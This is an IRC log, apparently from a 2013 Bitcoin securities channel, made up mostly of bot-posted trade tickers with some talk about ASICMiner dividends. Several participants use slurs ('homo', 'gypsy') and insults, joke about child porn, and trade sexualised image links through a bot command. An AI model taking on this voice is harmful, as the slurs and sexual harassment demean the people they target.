BTC [+] Aug 01 07:24:58 [BTCTC] [BTCGARDEN] 25 @ 0.01595 = 0.3988 BTC [-] Aug 01 07:26:23 [BTCTC] [LABCOIN] 300 @ 0.00272 = 0.816 BTC [+] Aug 01 07:26:59 [BTCTC] [BTCGARDEN] 2250 @ 0.016 = 36 BTC [+] Aug 01 07:27:34 [BTCTC] [LABCOIN] 1000 @ 0.002709 = 2.709 BTC [-] Aug 01 07:27:46 [BTCTC] [LABCOIN] 500 @ 0.002713 = 1.3565 BTC [+] Aug 01 07:27:51 [BTCTC] [BASIC-MINING] 3 @ 0.4014 = 1.2042 BTC [-] Aug 01 07:27:53 [BTCTC] [BTCGARDEN] 1250 @ 0.016 = 20 BTC [+] Aug 01 07:28:48 [BTCTC] [ACTIVEMINING] 19 @ 0.006001 = 0.114 BTC [-] Aug 01 07:28:54 [BTCTC] [BTCGARDEN] 31 @ 0.016 = 0.496 BTC [+] Aug 01 07:29:03 [BTCTC] [ACTIVEMINING] 6 @ 0.006002 = 0.036 BTC [+] Aug 01 07:29:21 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 01 07:29:24 [BTCTC] [BASIC-MINING] 14 @ 0.4014 = 5.6196 BTC [-] Aug 01 07:29:33 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 07:29:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.0401 = 0.2005 BTC [-] Aug 01 07:29:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0392 BTC [-] Aug 01 07:29:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.0391 = 0.0782 BTC [-] Aug 01 07:29:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.03909 = 0.1564 BTC [-] Aug 01 07:29:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.03902 = 0.4682 BTC [-] Aug 01 07:30:29 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 01 07:30:43 [BTCTC] [LABCOIN] 1 @ 0.002712 BTC [-] Aug 01 07:30:58 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 07:31:33 [BTCTC] [LABCOIN] 1162 @ 0.002707 = 3.1455 BTC [-] Aug 01 07:31:46 [BTCTC] [BTCGARDEN] 160 @ 0.016 = 2.56 BTC [+] Aug 01 07:32:06 [BTCTC] [LABCOIN] 800 @ 0.00271 = 2.168 BTC [+] Aug 01 07:32:30 [BTCTC] [ACTIVEMINING] 1 @ 0.006003 BTC [+] Aug 01 07:32:31 [BTCTC] [LABCOIN] 499 @ 0.002708 = 1.3513 BTC [-] Aug 01 07:32:40 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 07:32:59 [BTCTC] [LABCOIN] 50 @ 0.00271 = 0.1355 BTC [+] Aug 01 07:33:26 [BTCTC] [LABCOIN] 500 @ 0.002896 = 1.448 BTC [+] Aug 01 07:33:28 [BTCTC] [BTCGARDEN] 9375 @ 0.016 = 150 BTC [+] Aug 01 07:33:33 [BTCTC] [BTCGARDEN] 9500 @ 0.016 = 152 BTC [+] Aug 01 07:33:34 [BTCTC] [LABCOIN] 1000 @ 0.002898 = 2.898 BTC [+] Aug 01 07:33:38 [BTCTC] [LABCOIN] 500 @ 0.002899 = 1.4495 BTC [+] Aug 01 07:33:41 [BTCTC] [LABCOIN] 1000 @ 0.002995 = 2.995 BTC [+] Aug 01 07:33:48 [BTCTC] [BTCGARDEN] 187 @ 0.016 = 2.992 BTC [+] Aug 01 07:34:24 [BTCTC] [LABCOIN] 80 @ 0.002995 = 0.2396 BTC [+] Aug 01 07:34:35 [BTCTC] [BTCGARDEN] 95 @ 0.016 = 1.52 BTC [+] Aug 01 07:34:39 [BTCTC] [LABCOIN] 500 @ 0.002995 = 1.4975 BTC [+] Aug 01 07:34:52 [BTCTC] [ASICMINER-PT] 3 @ 4.12 = 12.36 BTC [-] Aug 01 07:34:53 [BTCTC] [LABCOIN] 500 @ 0.002995 = 1.4975 BTC [+] Aug 01 07:34:59 mircea_popescu: http://www.firme.info/polimedia-srl-cui22530016/indicatori-financiari.html Aug 01 07:35:00 [BTCTC] [ASICMINER-PT] 9 @ 4.111 = 36.999 BTC [-] Aug 01 07:35:00 [BTCTC] [ACTIVEMINING] 20 @ 0.006003 = 0.1201 BTC [+] Aug 01 07:35:18 [HAVELOCK] [SMG] 17 @ 0.0002692 = 0.0046 BTC [+] Aug 01 07:35:23 yea ? Aug 01 07:35:26 mircea_popescu: i lost 10k arguing with you fucker Aug 01 07:35:27 [BTCTC] [ASICMINER-PT] 24 @ 4.11 = 98.64 BTC [-] Aug 01 07:35:31 fucking clown Aug 01 07:35:35 [BTCTC] [ASICMINER-PT] 64 @ 4.11 = 263.04 BTC [-] Aug 01 07:35:39 <[\\\]> https://sphotos-a-ord.xx.fbcdn.net/hphotos-ash3/q71/547365_10151552216623091_1353704227_n.jpg Aug 01 07:35:41 [BTCTC] [ASICMINER-PT] 2 @ 4.11 = 8.22 BTC [-] Aug 01 07:35:41 do you have a point somewhere in there ? Aug 01 07:35:45 [BTCTC] [ASICMINER-PT] 12 @ 4.1 = 49.2 BTC [-] Aug 01 07:35:48 [BTCTC] [ASICMINER-PT] 2 @ 4.081 = 8.162 BTC [-] Aug 01 07:35:51 [BTCTC] [ASICMINER-PT] 6 @ 4.081 = 24.486 BTC [-] Aug 01 07:36:06 http://www.askdamagex.com/showthread.php?t=30257&page=2&p=299494&viewfull=1#post299494 Aug 01 07:36:10 Who else got the DamageX. PM - Page 2 Aug 01 07:36:20 [BTCTC] [TAT.MINIGAME] 3 @ 0.00029 = 0.0009 BTC [+] Aug 01 07:36:55 inb4 child porn. Aug 01 07:37:15 [BTCTC] [LABCOIN] 3 @ 0.002898 = 0.0087 BTC [-] Aug 01 07:37:20 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 01 07:37:26 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [+] Aug 01 07:37:58 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 01 07:38:06 <[\\\]> I see asicminer.info reports <.02 dividend for AM Aug 01 07:38:10 <[\\\]> is this the beginning of the end? Aug 01 07:38:13 [BTCTC] [LABCOIN] 2000 @ 0.00295 = 5.9 BTC [+] Aug 01 07:38:15 [BTCTC] [LABCOIN] 20 @ 0.002995 = 0.0599 BTC [+] Aug 01 07:38:26 [BTCTC] [ASICMINER-PT] 2 @ 4.11 = 8.22 BTC [+] Aug 01 07:38:30 mircea_popescu: what condition do you have? Aug 01 07:38:57 [\\\] well logically they can't be expected to keep increasing divs Aug 01 07:39:05 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [+] Aug 01 07:39:07 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 01 07:39:14 speak up, gypsy Aug 01 07:39:21 <[\\\]> mircea_popescu, why is that? Were they not setting aside funds for expansion? Aug 01 07:39:49 [\\\] lol i guess you have a point there. Aug 01 07:39:56 [BTCTC] [LABCOIN] 380 @ 0.002995 = 1.1381 BTC [+] Aug 01 07:39:58 [BTCTC] [LABCOIN] 221 @ 0.002995 = 0.6619 BTC [+] Aug 01 07:39:58 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Aug 01 07:40:00 pizza_deliveri!*@* added to ignore list. Aug 01 07:40:01 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [-] Aug 01 07:40:02 [BTCTC] [LABCOIN] 25 @ 0.002996 = 0.0749 BTC [+] Aug 01 07:40:04 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [-] Aug 01 07:40:06 [BTCTC] [LABCOIN] 834 @ 0.002997 = 2.4995 BTC [+] Aug 01 07:40:10 <[\\\]> There's a difference between maintaining and increasing. Aug 01 07:40:17 <[\\\]> OBviously, most businesses go for growth Aug 01 07:40:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006005 = 0.1501 BTC [+] Aug 01 07:40:29 <[\\\]> but due to the nature of bitcoin mining, maintaining is actually growing Aug 01 07:40:34 exactly. Aug 01 07:40:36 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 07:40:40 so losing a little might also be growing. Aug 01 07:40:46 <[\\\]> depends Aug 01 07:41:03 <[\\\]> I heard they have tons of stales because of the great firewall Aug 01 07:41:14 they don't really mine in china do they ? Aug 01 07:41:14 [BTCTC] [LABCOIN] 14 @ 0.002997 = 0.042 BTC [+] Aug 01 07:41:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006005 = 0.1501 BTC [+] Aug 01 07:41:22 [BTCTC] [ASICMINER-PT] 1 @ 4.081 BTC [+] Aug 01 07:41:23 <[\\\]> where would they mine? Aug 01 07:41:26 [BTCTC] [LABCOIN] 1 @ 0.002897 BTC [-] Aug 01 07:41:28 [BTCTC] [ASICMINER-PT] 3 @ 4.081 = 12.243 BTC [+] Aug 01 07:41:34 [BTCTC] [LABCOIN] 80 @ 0.002896 = 0.2317 BTC [-] Aug 01 07:41:35 [BTCTC] [ASICMINER-PT] 1 @ 4.081 BTC [+] Aug 01 07:41:48 <[\\\]> nice ass Aug 01 07:41:50 [BTCTC] [LABCOIN] 13 @ 0.002896 = 0.0376 BTC [-] Aug 01 07:41:53 [BTCTC] [LABCOIN] 100 @ 0.00295 = 0.295 BTC [+] Aug 01 07:41:54 [BTCTC] [LABCOIN] 87 @ 0.002997 = 0.2607 BTC [+] Aug 01 07:42:21 [BTCTC] [ASICMINER-PT] 2 @ 4.158 = 8.316 BTC [+] Aug 01 07:42:31 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 01 07:42:45 [BTCTC] [BTCGARDEN] 3430 @ 0.016 = 54.88 BTC [+] Aug 01 07:43:01 get my pizza homo Aug 01 07:43:16 no tip for you Aug 01 07:43:23 [BTCTC] [BTCGARDEN] 230 @ 0.016 = 3.68 BTC [+] Aug 01 07:43:28 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 01 07:43:44 [BTCTC] [BTCGARDEN] 11 @ 0.016 = 0.176 BTC [+] Aug 01 07:43:46 [\\\] pls convey the ass ty. Aug 01 07:44:20 I would expect them to at least use a VPN to Hong Kong Aug 01 07:44:31 [BTCTC] [LABCOIN] 3 @ 0.00295 = 0.0089 BTC [-] Aug 01 07:44:38 <[\\\]> Urushiol, you would think. Aug 01 07:44:49 [BTCTC] [TAT.ASICMINER] 70 @ 0.04194 = 2.9358 BTC [+] Aug 01 07:44:52 thpizza boy has to have a nice ass Aug 01 07:45:00 <[\\\]> Urushiol, I'm sure many people would offer to be a tor tunnel for them. Aug 01 07:45:36 anyone else delayed getting cash out from btct Aug 01 07:45:39 [BTCTC] [LABCOIN] 5 @ 0.00295 = 0.0148 BTC [-] Aug 01 07:45:56 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 07:46:24 [BTCTC] [BTCGARDEN] 258 @ 0.016 = 4.128 BTC [+] Aug 01 07:47:01 <[\\\]> ozbot: .bait Aug 01 07:47:05 <[\\\]> .bait Aug 01 07:47:09 http://24.media.tumblr.com/695945e469edc7d2b7d6a863a8071a97/tumblr_mkps0ztciH1s7svwro1_500.gif Aug 01 07:47:09 [BTCTC] [BTCGARDEN] 6190 @ 0.016 = 99.04 BTC [+] Aug 01 07:47:27 <[\\\]> mircea_popescu, not ass, but it'll work Aug 01 07:47:46 nice job, nice slut, ty. Aug 01 07:47:54 haha who need porn... i have irc Aug 01 07:47:57 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 07:47:59 i am going to rub my nasty pizza face all over her Aug 01 07:47:59 <[\\\]> good old ozbot Aug 01 07:48:02 <[\\\]> .bait Aug 01 07:48:09 http://24.media.tumblr.com/tumblr_m5ssospYJK1qzxs2so1_400.jpg Aug 01 07:48:16 <[\\\]> there's your ass Aug 01 07:48:18 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 07:48:22 [BTCTC] [BTCGARDEN] 75 @ 0.016 = 1.2 BTC [+] Aug 01 07:48:45 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 01 07:48:49 [BTCTC] [ASICMINER-PT] 1 @ 4.108 BTC [-] Aug 01 07:48:54 i liked the boobjob better. Aug 01 07:48:59 it sorta looks like an ass... Aug 01 07:49:07 [BTCTC] [LABCOIN] 15 @ 0.00295 = 0.0443 BTC [-] Aug 01 07:49:13 <[\\\]> .bait Aug 01 07:49:16 http://24.media.tumblr.com/tumblr_me7beeLZqP1qbv7cwo1_1280.jpg Aug 01 07:49:23 <[\\\]> pass. Aug 01 07:49:29 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 07:49:58 [BTCTC] [ASICMINER-PT] 1 @ 4.108 BTC [-] Aug 01 07:50:05 I'd take one for the team. Aug 01 07:50:32 I would expect assbot to be the one to provide those links Aug 01 07:50:35 [BTCTC] [LABCOIN] 20 @ 0.002801 = 0.056 BTC [-] Aug 01 07:50:40 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 01 07:50:43 assbot is shy Aug 01 07:50:44 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 07:50:48 ozbot's been trying to seduce it forever. Aug 01 07:50:54 <[\\\]> .bait Aug 01 07:50:58 http://31.media.tumblr.com/68ab7882699a5d66822d26e574b61441/tumblr_mlcwskpexX1s335geo1_500.jpg Aug 01 07:51:06 <[\\\]> bad girl. Aug 01 07:51:24 [BTCTC] [LABCOIN] 28 @ 0.0028 = 0.0784 BTC [-] Aug 01 07:51:26 [BTCTC] [ACTIVEMINING] 25 @ 0.005817 = 0.1454 BTC [-] Aug 01 07:51:28 [BTCTC] [LABCOIN] 22 @ 0.0028 = 0.0616 BTC [-] Aug 01 07:51:32 [BTCTC] [ACTIVEMINING] 4 @ 0.005816 = 0.0233 BTC [-] Aug 01 07:51:37 [BTCTC] [ACTIVEMINING] 89 @ 0.005816 = 0.5176 BTC [-] Aug 01 07:52:10 [BTCTC] [LABCOIN] 978 @ 0.0028 = 2.7384 BTC [-] Aug 01 07:52:13 [BTCTC] [LABCOIN] 3000 @ 0.002722 = 8.166 BTC [-] Aug 01 07:52:17 [BTCTC] [LABCOIN] 1000 @ 0.002715 = 2.715 BTC [-] Aug 01 07:52:17 [BTCTC] [ACTIVEMINING] 25 @ 0.006197 = 0.1549 BTC [+] Aug 01 07:52:20 [BTCTC] [LABCOIN] 503 @ 0.002714 = 1.3651 BTC [-] Aug 01 07:52:37 [BTCTC] [LABCOIN] 50 @ 0.002722 = 0.1361 BTC [+] Aug 01 07:52:41 mornin Aug 01 07:52:45 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [+] Aug 01 07:52:54 ah, there's Europe Aug 01 07:52:59 yawn Aug 01 07:53:02 hi Aug 01 07:53:04 [MPEX] [S.MPOE] 9380 @ 0.00080858 = 7.5845 BTC [+] Aug 01 07:53:20 [BTCTC] [ASICMINER-PT] 11 @ 4.071 = 44.781 BTC [-] Aug 01 07:53:25 [BTCTC] [LABCOIN] 255 @ 0.002801 = 0.7143 BTC [+] Aug 01 07:53:27 [BTCTC] [LABCOIN] 1 @ 0.002949 BTC [+] Aug 01 07:53:27 labcoin and btcgarden have been interesting Aug 01 07:53:30 [BTCTC] [LABCOIN] 477 @ 0.00295 = 1.4072 BTC [+] Aug 01 07:53:32 [BTCTC] [LABCOIN] 65 @ 0.002997 = 0.1948 BTC [+] Aug 01 07:53:35 [BTCTC] [LABCOIN] 166 @ 0.003 = 0.498 BTC [+] Aug 01 07:53:36 well, btcgarden has been rather noneventful Aug 01 07:53:37 [BTCTC] [LABCOIN] 1848 @ 0.003089 = 5.7085 BTC [+] Aug 01 07:53:40 [BTCTC] [LABCOIN] 1088 @ 0.00309 = 3.3619 BTC [+] Aug 01 07:53:42 5.9k of 15k filled (labcoin) Aug 01 07:53:45 [BTCTC] [LABCOIN] 3 @ 0.002733 = 0.0082 BTC [-] Aug 01 07:53:47 [BTCTC] [LABCOIN] 22 @ 0.002715 = 0.0597 BTC [-] Aug 01 07:54:08 [BTCTC] [BTCGARDEN] 9600 @ 0.016 = 153.6 BTC [+] Aug 01 07:54:34 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 07:54:50 seems to have worked Aug 01 07:55:19 [BTCTC] [BTCGARDEN] 2750 @ 0.016 = 44 BTC [+] Aug 01 07:56:12 "garden" just sounds too sus for me Aug 01 07:56:25 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 01 07:56:30 http://travelthailand.biz/bitcoin-weekly-2013-july-31-thailand-bans-bitcoin-bitcoin-movie-kicked-from-kickstarter-data-is-here-to-self/ Aug 01 07:56:37 what the fuck is with all the spamming Aug 01 07:56:57 every spamblog out there backlinking to me ;/ Aug 01 07:57:29 [BTCTC] [BTCGARDEN] 133 @ 0.016 = 2.128 BTC [+] Aug 01 07:58:32 [BTCTC] [ACTIVEMINING] 50 @ 0.006197 = 0.3099 BTC [+] Aug 01 07:58:54 btcstripclub Aug 01 07:58:59 [BTCTC] [BTCGARDEN] 100 @ 0.01597 = 1.597 BTC [-] Aug 01 07:59:02 [BTCTC] [BTCGARDEN] 1000 @ 0.01596 = 15.96 BTC [-] Aug 01 07:59:05 [BTCTC] [BTCGARDEN] 900 @ 0.01596 = 14.364 BTC [-] Aug 01 07:59:10 [BTCTC] [LABCOIN] 52 @ 0.003087 = 0.1605 BTC [+] Aug 01 07:59:29 [BTCTC] [ACTIVEMINING] 75 @ 0.006197 = 0.4648 BTC [+] Aug 01 07:59:39 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 01 07:59:53 [BTCTC] [LABCOIN] 10 @ 0.003087 = 0.0309 BTC [+] Aug 01 08:00:16 [BTCTC] [LABCOIN] 26 @ 0.003088 = 0.0803 BTC [+] Aug 01 08:00:40 [BTCTC] [LABCOIN] 32 @ 0.003088 = 0.0988 BTC [+] Aug 01 08:00:56 [BTCTC] [LABCOIN] 21 @ 0.003087 = 0.0648 BTC [-] Aug 01 08:01:22 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 08:01:23 [BTCTC] [LABCOIN] 679 @ 0.003087 = 2.0961 BTC [-] Aug 01 08:01:25 [BTCTC] [LABCOIN] 321 @ 0.003088 = 0.9912 BTC [+] Aug 01 08:02:43 [BTCTC] [BTCGARDEN] 32 @ 0.016 = 0.512 BTC [+] Aug 01 08:04:09 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 01 08:05:29 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [+] Aug 01 08:06:00 [BTCTC] [LABCOIN] 255 @ 0.00308 = 0.7854 BTC [-] Aug 01 08:06:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006195 = 0.1549 BTC [-] Aug 01 08:06:33 [BTCTC] [ACTIVEMINING] 50 @ 0.006196 = 0.3098 BTC [+] Aug 01 08:06:35 [BTCTC] [ACTIVEMINING] 190 @ 0.006197 = 1.1774 BTC [+] Aug 01 08:06:38 [BTCTC] [ACTIVEMINING] 100 @ 0.006198 = 0.6198 BTC [+] Aug 01 08:06:41 [BTCTC] [ACTIVEMINING] 100 @ 0.0062 = 0.62 BTC [+] Aug 01 08:06:43 [BTCTC] [ACTIVEMINING] 35 @ 0.0062 = 0.217 BTC [+] Aug 01 08:06:48 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 08:06:53 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 01 08:07:46 [BTCTC] [BTCGARDEN] 21 @ 0.016 = 0.336 BTC [+] Aug 01 08:07:51 [BTCTC] [ACTIVEMINING] 25 @ 0.006005 = 0.1501 BTC [-] Aug 01 08:08:04 [BTCTC] [ACTIVEMINING] 50 @ 0.006004 = 0.3002 BTC [-] Aug 01 08:08:16 [BTCTC] [ACTIVEMINING] 45 @ 0.006002 = 0.2701 BTC [-] Aug 01 08:08:21 [BTCTC] [ACTIVEMINING] 66 @ 0.006 = 0.396 BTC [-] Aug 01 08:08:35 [BTCTC] [LABCOIN] 3000 @ 0.003 = 9 BTC [-] Aug 01 08:08:37 [BTCTC] [ACTIVEMINING] 20 @ 0.0061 = 0.122 BTC [+] Aug 01 08:09:31 [BTCTC] [ACTIVEMINING] 37 @ 0.006005 = 0.2222 BTC [-] Aug 01 08:09:33 [BTCTC] [ACTIVEMINING] 12 @ 0.006003 = 0.072 BTC [-] Aug 01 08:11:11 [BTCTC] [ACTIVEMINING] 25 @ 0.006004 = 0.1501 BTC [+] Aug 01 08:11:24 [BTCTC] [LABCOIN] 3 @ 0.003069 = 0.0092 BTC [+] Aug 01 08:11:39 [BTCTC] [LABCOIN] 50 @ 0.003069 = 0.1535 BTC [+] Aug 01 08:11:56 [BTCTC] [LABCOIN] 169 @ 0.003069 = 0.5187 BTC [+] Aug 01 08:11:57 [BTCTC] [BTCGARDEN] 830 @ 0.016 = 13.28 BTC [+] Aug 01 08:12:55 [BTCTC] [LABCOIN] 250 @ 0.00301 = 0.7525 BTC [-] Aug 01 08:12:57 [BTCTC] [LABCOIN] 1500 @ 0.002852 = 4.278 BTC [-] Aug 01 08:12:59 [BTCTC] [ACTIVEMINING] 25 @ 0.006098 = 0.1525 BTC [+] Aug 01 08:13:01 [BTCTC] [LABCOIN] 1 @ 0.002851 BTC [-] Aug 01 08:13:02 [BTCTC] [ACTIVEMINING] 93 @ 0.006099 = 0.5672 BTC [+] Aug 01 08:13:04 [BTCTC] [ACTIVEMINING] 2980 @ 0.0061 = 18.178 BTC [+] Aug 01 08:13:05 [BTCTC] [LABCOIN] 1000 @ 0.002851 = 2.851 BTC [-] Aug 01 08:13:06 [BTCTC] [LABCOIN] 25 @ 0.00285 = 0.0713 BTC [-] Aug 01 08:13:10 [BTCTC] [LABCOIN] 2 @ 0.002816 = 0.0056 BTC [-] Aug 01 08:13:13 [BTCTC] [LABCOIN] 1016 @ 0.002815 = 2.86 BTC [-] Aug 01 08:13:15 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 01 08:13:18 [BTCTC] [LABCOIN] 1924 @ 0.002813 = 5.4122 BTC [-] Aug 01 08:13:21 [BTCTC] [LABCOIN] 1500 @ 0.002805 = 4.2075 BTC [-] Aug 01 08:13:24 [BTCTC] [LABCOIN] 10 @ 0.0028 = 0.028 BTC [-] Aug 01 08:13:25 [BTCTC] [ACTIVEMINING] 25 @ 0.006197 = 0.1549 BTC [+] Aug 01 08:13:27 [BTCTC] [ACTIVEMINING] 50 @ 0.006198 = 0.3099 BTC [+] Aug 01 08:13:31 [BTCTC] [ACTIVEMINING] 2065 @ 0.0062 = 12.803 BTC [+] Aug 01 08:13:42 [BTCTC] [LABCOIN] 25 @ 0.0028 = 0.07 BTC [-] Aug 01 08:13:45 [BTCTC] [ACTIVEMINING] 200 @ 0.0063 = 1.26 BTC [+] Aug 01 08:13:47 [BTCTC] [LABCOIN] 1074 @ 0.0028 = 3.0072 BTC [-] Aug 01 08:13:48 [BTCTC] [ACTIVEMINING] 8000 @ 0.0063 = 50.4 BTC [+] Aug 01 08:14:01 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 01 08:14:12 [BTCTC] [KENILWORTH] 45 @ 0.001512 = 0.068 BTC [-] Aug 01 08:14:14 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 08:14:32 [BTCTC] [ACTIVEMINING] 38 @ 0.006003 = 0.2281 BTC [-] Aug 01 08:14:47 [BTCTC] [ACTIVEMINING] 25 @ 0.006003 = 0.1501 BTC [-] Aug 01 08:14:49 [BTCTC] [ACTIVEMINING] 50 @ 0.006004 = 0.3002 BTC [+] Aug 01 08:14:51 [BTCTC] [ACTIVEMINING] 13 @ 0.00602 = 0.0783 BTC [+] Aug 01 08:14:52 [BTCTC] [ACTIVEMINING] 31 @ 0.00639 = 0.1981 BTC [+] Aug 01 08:14:54 [BTCTC] [ACTIVEMINING] 881 @ 0.00639 = 5.6296 BTC [+] Aug 01 08:15:37 [BTCTC] [LABCOIN] 165 @ 0.0029 = 0.4785 BTC [+] Aug 01 08:15:38 [BTCTC] [ACTIVEMINING] 25 @ 0.005949 = 0.1487 BTC [-] Aug 01 08:16:07 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 01 08:16:12 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 01 08:16:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005949 = 0.1487 BTC [-] Aug 01 08:16:19 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 01 08:16:21 [BTCTC] [ACTIVEMINING] 11 @ 0.00595 = 0.0655 BTC [+] Aug 01 08:16:23 [BTCTC] [LABCOIN] 101 @ 0.003 = 0.303 BTC [+] Aug 01 08:16:25 [BTCTC] [ACTIVEMINING] 50 @ 0.006003 = 0.3002 BTC [+] Aug 01 08:16:38 [BTCTC] [LABCOIN] 68 @ 0.002822 = 0.1919 BTC [-] Aug 01 08:17:15 [BTCTC] [ACTIVEMINING] 3 @ 0.006099 = 0.0183 BTC [+] Aug 01 08:17:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005853 = 0.1463 BTC [-] Aug 01 08:17:52 [BTCTC] [DMS.SELLING] 2 @ 0.022 = 0.044 BTC [-] Aug 01 08:17:55 [BTCTC] [ACTIVEMINING] 50 @ 0.005852 = 0.2926 BTC [-] Aug 01 08:18:14 [MPEX] [S.MPOE] 4600 @ 0.00080886 = 3.7208 BTC [+] Aug 01 08:19:05 [BTCTC] [BTCGARDEN] 70 @ 0.016 = 1.12 BTC [+] Aug 01 08:19:57 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 01 08:20:26 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 08:20:28 [BTCTC] [TAT.MINIGAME] 697 @ 0.00026 = 0.1812 BTC [-] Aug 01 08:20:41 [BTCTC] [BTCGARDEN] 310 @ 0.016 = 4.96 BTC [+] Aug 01 08:20:43 [BTCTC] [LABCOIN] 390 @ 0.002989 = 1.1657 BTC [+] Aug 01 08:20:44 [BTCTC] [ASICMINER-PT] 3 @ 4.091 = 12.273 BTC [+] Aug 01 08:20:48 [BTCTC] [ASICMINER-PT] 7 @ 4.09 = 28.63 BTC [-] Aug 01 08:22:05 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 08:22:17 [BTCTC] [LABCOIN] 50 @ 0.002975 = 0.1488 BTC [-] Aug 01 08:22:20 [BTCTC] [LABCOIN] 158 @ 0.002979 = 0.4707 BTC [+] Aug 01 08:22:55 [BTCTC] [LABCOIN] 1000 @ 0.00285 = 2.85 BTC [-] Aug 01 08:22:57 [BTCTC] [LABCOIN] 2 @ 0.002821 = 0.0056 BTC [-] Aug 01 08:22:59 [BTCTC] [LABCOIN] 1500 @ 0.002821 = 4.2315 BTC [-] Aug 01 08:23:03 [BTCTC] [LABCOIN] 100 @ 0.00297 = 0.297 BTC [+] Aug 01 08:23:25 [BTCTC] [LABCOIN] 1420 @ 0.002979 = 4.2302 BTC [+] Aug 01 08:23:28 [BTCTC] [LABCOIN] 1000 @ 0.00298 = 2.98 BTC [+] Aug 01 08:23:29 [BTCTC] [LABCOIN] 1 @ 0.002994 BTC [+] Aug 01 08:23:31 [BTCTC] [LABCOIN] 250 @ 0.003 = 0.75 BTC [+] Aug 01 08:23:49 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.002651 = 0.0318 BTC [-] Aug 01 08:23:50 [BTCTC] [LABCOIN] 900 @ 0.002979 = 2.6811 BTC [-] Aug 01 08:23:55 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 08:23:59 [BTCTC] [LABCOIN] 100 @ 0.002979 = 0.2979 BTC [-] Aug 01 08:24:20 [BTCTC] [LABCOIN] 855 @ 0.003 = 2.565 BTC [+] Aug 01 08:24:22 [BTCTC] [LABCOIN] 145 @ 0.003 = 0.435 BTC [+] Aug 01 08:24:47 [BTCTC] [LABCOIN] 400 @ 0.002979 = 1.1916 BTC [-] Aug 01 08:24:49 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 01 08:24:53 [BTCTC] [LABCOIN] 12 @ 0.003 = 0.036 BTC [+] Aug 01 08:25:09 [BTCTC] [LABCOIN] 150 @ 0.002979 = 0.4469 BTC [-] Aug 01 08:25:20 [BTCTC] [LABCOIN] 49 @ 0.002822 = 0.1383 BTC [-] Aug 01 08:25:39 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 08:28:16 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 08:28:32 [BTCTC] [LABCOIN] 1 @ 0.002978 BTC [+] Aug 01 08:28:35 [BTCTC] [LABCOIN] 10 @ 0.002978 = 0.0298 BTC [+] Aug 01 08:28:58 [BTCTC] [DMS.PURCHASE] 1 @ 0.03353 BTC [+] Aug 01 08:29:46 [BTCTC] [DMS.SELLING] 2 @ 0.022 = 0.044 BTC [-] Aug 01 08:30:21 